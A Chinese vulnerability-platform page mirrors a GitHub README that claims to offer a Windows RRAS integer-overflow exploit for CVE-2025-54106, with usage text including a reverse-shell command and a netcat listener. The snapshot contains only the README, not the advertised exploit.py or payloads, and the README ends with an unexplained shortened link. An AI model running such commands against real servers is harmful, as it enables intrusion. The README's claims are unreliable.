漏洞平台

POC详情： ec70fad53bdc8460ea9641f8080b32ed9bbb08a7

来源

https://github.com/callinston/CVE-2025-54106

关联漏洞

标题： Microsoft Windows Routing and Remote Access Service 输入验证错误漏洞 (CVE-2025-54106)
描述：Microsoft Windows Routing and Remote Access Service是美国微软（Microsoft）公司的一种网络服务，用于实现网络路由、虚拟专用网络（VPN）和拨号连接等功能。 Microsoft Windows Routing and Remote Access Service存在输入验证错误漏洞。攻击者利用该漏洞可以远程执行代码。以下产品和版本受到影响：Windows Server 2019,Windows Server 2019 (Server Core inst

介绍

# CVE-2025-54106 - Windows RRAS Integer Overflow Exploit

## Overview

This repository provides a proof-of-concept (PoC) exploit for CVE-2025-54106, a critical integer overflow vulnerability in the Routing and Remote Access Service (RRAS) component of Microsoft Windows Server versions from 2012 R2 up to 2022 23H2. The vulnerability allows remote code execution (RCE) without authentication by sending specially crafted network packets that trigger an integer wraparound during packet processing.

The exploit targets the RRAS service, typically exposed on ports like 1701 (L2TP), 1723 (PPTP), or others depending on configuration. It exploits an integer overflow in the handling of routing table entries or connection parameters, leading to memory corruption and arbitrary code execution in SYSTEM context.

This PoC is for educational and security research purposes only. It demonstrates the vulnerability in a controlled lab environment. Do not use on production systems or without permission.

## Requirements

- Python 3.10 or higher
- Access to a vulnerable Windows Server instance with RRAS enabled and exposed
- Attacker machine on the same network or with remote access to the target
- Tested on:
  - Windows Server 2022 23H2 (Build 20348.2527)
  - Windows Server 2019 (Build 17763.5936)


## Usage

The main exploit script is `exploit.py`. It crafts and sends malformed packets to trigger the overflow.

### Basic Command
```
python exploit.py --target <TARGET_IP> --port <PORT> --payload <PAYLOAD_TYPE> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>
```

- `--target`: IP address of the vulnerable RRAS server.
- `--port`: Port where RRAS is listening (default: 1701 for L2TP).
- `--payload`: Type of payload.
- `--lhost`: Attacker's IP for reverse connections.
- `--lport`: Attacker's listening port (default: 4444).
- `--verbose`: Enable detailed output (optional).

### Example

**Reverse Shell:**

   ```
   python exploit.py --target 192.168.1.100 --port 1701 --payload reverse_shell --lhost 192.168.1.50 --lport 4444
   ```
   Start a listener on your machine (e.g., `nc -lvnp 4444`) before running.

### Payload Customization
Custom payloads can be added in the `payloads/` directory. See `payloads/reverse_shell.bin` for an example.


### Mitigation
- Apply the official patch from Microsoft: [MSRC Advisory](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54106).
- Disable RRAS if not needed.
- Use firewalls to restrict access to RRAS ports.

## Files in Folder

- `exploit.py`: Main exploit script.
- `requirements.txt`: Python dependencies.
- `payloads/`: Directory for shellcode and binaries (e.g., `reverse_shell.bin`).
- `docs/`: Additional notes on ROP chains and memory layouts for different server versions.


## Disclaimer

This tool is intended for security professionals and researchers. The author assumes no liability for any damages. Use responsibly and ethically.

[href](https://tinyurl.com/5n9aw3jz)

For any inquiries, please email me at: eviedejesu803@gmail.com

文件快照


 [4.0K]  /data/pocs/ec70fad53bdc8460ea9641f8080b32ed9bbb08a7
└── [2.9K]  README.md

0 directories, 1 file

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。